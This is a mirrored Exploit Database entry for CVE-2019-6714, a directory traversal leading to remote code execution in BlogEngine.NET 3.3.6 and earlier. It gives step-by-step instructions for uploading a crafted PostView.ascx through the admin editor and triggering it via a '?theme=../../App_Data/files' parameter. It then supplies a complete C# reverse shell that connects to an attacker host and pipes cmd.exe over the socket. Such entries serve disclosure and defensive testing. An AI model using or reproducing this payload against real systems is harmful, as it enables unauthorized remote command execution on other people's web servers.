BlogEngine.NET 3.3.6 – Directory Traversal / Remote Code Execution

• Exploit Database
• 17 阅读

• 作者： Dustin Cobb
  日期： 2019-02-12
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/46353/

• # Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
  # Date: 02-11-2019
  # Exploit Author: Dustin Cobb
  # Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
  # Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
  # Version: <= 3.3.6
  # Tested on: Windows 2016 Standard / IIS 10.0
  # CVE : CVE-2019-6714
  
  /*
   * CVE-2019-6714
   *
   * Path traversal vulnerability leading to remote code execution.This 
   * vulnerability affects BlogEngine.NET versions 3.3.6 and below.This 
   * is caused by an unchecked "theme" parameter that is used to override
   * the default theme for rendering blog pages.The vulnerable code can 
   * be seen in this file:
   * 
   * /Custom/Controls/PostList.ascx.cs
   *
   * Attack:
   *
   * First, we set the TcpClient address and port within the method below to 
   * our attack host, who has a reverse tcp listener waiting for a connection.
   * Next, we upload this file through the file manager.In the current (3.3.6)
   * version of BlogEngine, this is done by editing a post and clicking on the 
   * icon that looks like an open file in the toolbar.Note that this file must
   * be uploaded as PostView.ascx. Once uploaded, the file will be in the
   * /App_Data/files directory off of the document root. The admin page that
   * allows upload is:
   *
   * http://10.10.10.10/admin/app/editor/editpost.cshtml
   *
   *
   * Finally, the vulnerability is triggered by accessing the base URL for the 
   * blog with a theme override specified like so:
   *
   * http://10.10.10.10/?theme=../../App_Data/files
   *
   */
  
  <%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
  <%@ Import Namespace="BlogEngine.Core" %>
  
  <script runat="server">
  	static System.IO.StreamWriter streamWriter;
  
  protected override void OnLoad(EventArgs e) {
  base.OnLoad(e);
  
  	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
  		using(System.IO.Stream stream = client.GetStream()) {
  			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
  				streamWriter = new System.IO.StreamWriter(stream);
  						
  				StringBuilder strInput = new StringBuilder();
  
  				System.Diagnostics.Process p = new System.Diagnostics.Process();
  				p.StartInfo.FileName = "cmd.exe";
  				p.StartInfo.CreateNoWindow = true;
  				p.StartInfo.UseShellExecute = false;
  				p.StartInfo.RedirectStandardOutput = true;
  				p.StartInfo.RedirectStandardInput = true;
  				p.StartInfo.RedirectStandardError = true;
  				p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
  				p.Start();
  				p.BeginOutputReadLine();
  
  				while(true) {
  					strInput.Append(rdr.ReadLine());
  					p.StandardInput.WriteLine(strInput);
  					strInput.Remove(0, strInput.Length);
  				}
  			}
  		}
  	}
  }
  
  private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
   	StringBuilder strOutput = new StringBuilder();
  
   	if (!String.IsNullOrEmpty(outLine.Data)) {
   		try {
  	strOutput.Append(outLine.Data);
  	streamWriter.WriteLine(strOutput);
  	streamWriter.Flush();
  } catch (Exception err) { }
  }
  }
  
  </script>
  <asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>